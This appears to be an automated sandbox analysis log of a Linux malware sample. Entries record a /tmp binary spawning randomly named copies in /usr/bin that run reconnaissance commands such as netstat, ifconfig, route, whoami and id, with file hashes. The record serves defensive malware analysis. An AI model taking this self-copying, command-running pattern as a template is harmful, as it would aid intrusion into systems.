                                                                                Start time:00:24:54
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:54
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/tstbdpivhl
                                                                                Arguments:/usr/bin/tstbdpivhl "echo \"find\"" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:383e0852639ec4d6a14747fa2d30695a

                                                                                General

                                                                                Start time:00:24:54
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/tstbdpivhl
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:383e0852639ec4d6a14747fa2d30695a

                                                                                General

                                                                                Start time:00:24:54
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:54
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:54
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/tstbdpivhl
                                                                                Arguments:/usr/bin/tstbdpivhl "netstat -antop" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:383e0852639ec4d6a14747fa2d30695a

                                                                                General

                                                                                Start time:00:24:54
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/tstbdpivhl
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:383e0852639ec4d6a14747fa2d30695a

                                                                                General

                                                                                Start time:00:24:54
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:54
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:54
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/tstbdpivhl
                                                                                Arguments:/usr/bin/tstbdpivhl "netstat -antop" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:383e0852639ec4d6a14747fa2d30695a

                                                                                General

                                                                                Start time:00:24:54
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/tstbdpivhl
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:383e0852639ec4d6a14747fa2d30695a

                                                                                General

                                                                                Start time:00:24:54
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:54
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:54
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/tstbdpivhl
                                                                                Arguments:/usr/bin/tstbdpivhl "ifconfig eth0" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:383e0852639ec4d6a14747fa2d30695a

                                                                                General

                                                                                Start time:00:24:54
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/tstbdpivhl
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:383e0852639ec4d6a14747fa2d30695a

                                                                                General

                                                                                Start time:00:24:54
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:54
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:54
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/tstbdpivhl
                                                                                Arguments:/usr/bin/tstbdpivhl uptime 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:383e0852639ec4d6a14747fa2d30695a

                                                                                General

                                                                                Start time:00:24:54
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/tstbdpivhl
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:383e0852639ec4d6a14747fa2d30695a

                                                                                General

                                                                                Start time:00:25:00
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:00
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:00
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/lndoiatrux
                                                                                Arguments:/usr/bin/lndoiatrux pwd 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:95dd8784b1ea342ebf09b13bd11667c3

                                                                                General

                                                                                Start time:00:25:00
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/lndoiatrux
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:95dd8784b1ea342ebf09b13bd11667c3

                                                                                General

                                                                                Start time:00:25:00
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:00
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:00
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/lndoiatrux
                                                                                Arguments:/usr/bin/lndoiatrux id 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:95dd8784b1ea342ebf09b13bd11667c3

                                                                                General

                                                                                Start time:00:25:00
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/lndoiatrux
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:95dd8784b1ea342ebf09b13bd11667c3

                                                                                General

                                                                                Start time:00:25:00
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:00
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:00
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/lndoiatrux
                                                                                Arguments:/usr/bin/lndoiatrux id 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:95dd8784b1ea342ebf09b13bd11667c3

                                                                                General

                                                                                Start time:00:25:00
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/lndoiatrux
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:95dd8784b1ea342ebf09b13bd11667c3

                                                                                General

                                                                                Start time:00:25:00
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:00
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:00
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/lndoiatrux
                                                                                Arguments:/usr/bin/lndoiatrux "cd /etc" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:95dd8784b1ea342ebf09b13bd11667c3

                                                                                General

                                                                                Start time:00:25:00
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/lndoiatrux
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:95dd8784b1ea342ebf09b13bd11667c3

                                                                                General

                                                                                Start time:00:25:00
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:00
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:00
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/lndoiatrux
                                                                                Arguments:/usr/bin/lndoiatrux "grep \"A\"" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:95dd8784b1ea342ebf09b13bd11667c3

                                                                                General

                                                                                Start time:00:25:00
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/lndoiatrux
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:95dd8784b1ea342ebf09b13bd11667c3

                                                                                General

                                                                                Start time:00:25:05
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:05
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:05
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/nefhkhnwwh
                                                                                Arguments:/usr/bin/nefhkhnwwh whoami 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:e4786d4b6ed08079c7dbfc4c2ec6de77

                                                                                General

                                                                                Start time:00:25:05
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/nefhkhnwwh
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:e4786d4b6ed08079c7dbfc4c2ec6de77

                                                                                General

                                                                                Start time:00:25:05
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:05
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:05
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/nefhkhnwwh
                                                                                Arguments:/usr/bin/nefhkhnwwh bash 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:e4786d4b6ed08079c7dbfc4c2ec6de77

                                                                                General

                                                                                Start time:00:25:05
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/nefhkhnwwh
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:e4786d4b6ed08079c7dbfc4c2ec6de77

                                                                                General

                                                                                Start time:00:25:05
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:05
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:05
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/nefhkhnwwh
                                                                                Arguments:/usr/bin/nefhkhnwwh id 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:e4786d4b6ed08079c7dbfc4c2ec6de77

                                                                                General

                                                                                Start time:00:25:05
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/nefhkhnwwh
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:e4786d4b6ed08079c7dbfc4c2ec6de77

                                                                                General

                                                                                Start time:00:25:05
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:05
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:05
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/nefhkhnwwh
                                                                                Arguments:/usr/bin/nefhkhnwwh uptime 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:e4786d4b6ed08079c7dbfc4c2ec6de77

                                                                                General

                                                                                Start time:00:25:05
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/nefhkhnwwh
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:e4786d4b6ed08079c7dbfc4c2ec6de77

                                                                                General

                                                                                Start time:00:25:05
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:05
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:05
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/nefhkhnwwh
                                                                                Arguments:/usr/bin/nefhkhnwwh top 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:e4786d4b6ed08079c7dbfc4c2ec6de77

                                                                                General

                                                                                Start time:00:25:05
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/nefhkhnwwh
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:e4786d4b6ed08079c7dbfc4c2ec6de77

                                                                                General

                                                                                Start time:00:25:10
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:10
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:10
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/bjhmdsecwa
                                                                                Arguments:/usr/bin/bjhmdsecwa pwd 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:179709d6a3905142c0aab9fed64966d1

                                                                                General

                                                                                Start time:00:25:10
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/bjhmdsecwa
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:179709d6a3905142c0aab9fed64966d1

                                                                                General

                                                                                Start time:00:25:11
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:11
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:11
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/bjhmdsecwa
                                                                                Arguments:/usr/bin/bjhmdsecwa ifconfig 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:179709d6a3905142c0aab9fed64966d1

                                                                                General

                                                                                Start time:00:25:11
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/bjhmdsecwa
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:179709d6a3905142c0aab9fed64966d1

                                                                                General

                                                                                Start time:00:25:11
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:11
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:11
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/bjhmdsecwa
                                                                                Arguments:/usr/bin/bjhmdsecwa "ifconfig eth0" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:179709d6a3905142c0aab9fed64966d1

                                                                                General

                                                                                Start time:00:25:11
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/bjhmdsecwa
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:179709d6a3905142c0aab9fed64966d1

                                                                                General

                                                                                Start time:00:25:11
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:11
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:11
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/bjhmdsecwa
                                                                                Arguments:/usr/bin/bjhmdsecwa whoami 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:179709d6a3905142c0aab9fed64966d1

                                                                                General

                                                                                Start time:00:25:11
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/bjhmdsecwa
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:179709d6a3905142c0aab9fed64966d1

                                                                                General

                                                                                Start time:00:25:11
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:11
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:11
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/bjhmdsecwa
                                                                                Arguments:/usr/bin/bjhmdsecwa "route -n" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:179709d6a3905142c0aab9fed64966d1

                                                                                General

                                                                                Start time:00:25:11
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/bjhmdsecwa
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:179709d6a3905142c0aab9fed64966d1

                                                                                General

                                                                                Start time:00:25:16
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:16
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:16
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/otvvhyamws
                                                                                Arguments:/usr/bin/otvvhyamws pwd 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:afaa93e460bc8ebfe6da8922820dbe8c

                                                                                General

                                                                                Start time:00:25:16
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/otvvhyamws
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:afaa93e460bc8ebfe6da8922820dbe8c

                                                                                General

                                                                                Start time:00:25:16
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:16
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:16
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/otvvhyamws
                                                                                Arguments:/usr/bin/otvvhyamws pwd 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:afaa93e460bc8ebfe6da8922820dbe8c

                                                                                General

                                                                                Start time:00:25:16
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/otvvhyamws
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:afaa93e460bc8ebfe6da8922820dbe8c

                                                                                General

                                                                                Start time:00:25:16
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:16
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:16
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/otvvhyamws
                                                                                Arguments:/usr/bin/otvvhyamws ifconfig 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:afaa93e460bc8ebfe6da8922820dbe8c

                                                                                General

                                                                                Start time:00:25:16
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/otvvhyamws
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:afaa93e460bc8ebfe6da8922820dbe8c

                                                                                General

                                                                                Start time:00:25:16
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:16
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:16
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/otvvhyamws
                                                                                Arguments:/usr/bin/otvvhyamws uptime 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:afaa93e460bc8ebfe6da8922820dbe8c

                                                                                General

                                                                                Start time:00:25:16
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/otvvhyamws
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:afaa93e460bc8ebfe6da8922820dbe8c

                                                                                General

                                                                                Start time:00:25:16
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:16
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:16
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/otvvhyamws
                                                                                Arguments:/usr/bin/otvvhyamws pwd 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:afaa93e460bc8ebfe6da8922820dbe8c

                                                                                General

                                                                                Start time:00:25:16
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/otvvhyamws
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:afaa93e460bc8ebfe6da8922820dbe8c

                                                                                General

                                                                                Start time:00:25:21
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:21
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:21
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/aysistkyqn
                                                                                Arguments:/usr/bin/aysistkyqn top 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:abb1b08513a6baa1a5ca70f8e8a23677

                                                                                General

                                                                                Start time:00:25:21
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/aysistkyqn
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:abb1b08513a6baa1a5ca70f8e8a23677

                                                                                General

                                                                                Start time:00:25:21
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:21
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:21
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/aysistkyqn
                                                                                Arguments:/usr/bin/aysistkyqn who 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:abb1b08513a6baa1a5ca70f8e8a23677

                                                                                General

                                                                                Start time:00:25:21
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/aysistkyqn
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:abb1b08513a6baa1a5ca70f8e8a23677

                                                                                General

                                                                                Start time:00:25:21
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:21
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:21
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/aysistkyqn
                                                                                Arguments:/usr/bin/aysistkyqn id 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:abb1b08513a6baa1a5ca70f8e8a23677

                                                                                General

                                                                                Start time:00:25:21
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/aysistkyqn
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:abb1b08513a6baa1a5ca70f8e8a23677

                                                                                General

                                                                                Start time:00:25:21
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:21
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:21
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/aysistkyqn
                                                                                Arguments:/usr/bin/aysistkyqn uptime 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:abb1b08513a6baa1a5ca70f8e8a23677

                                                                                General

                                                                                Start time:00:25:21
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/aysistkyqn
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:abb1b08513a6baa1a5ca70f8e8a23677

                                                                                General

                                                                                Start time:00:25:21
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:21
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

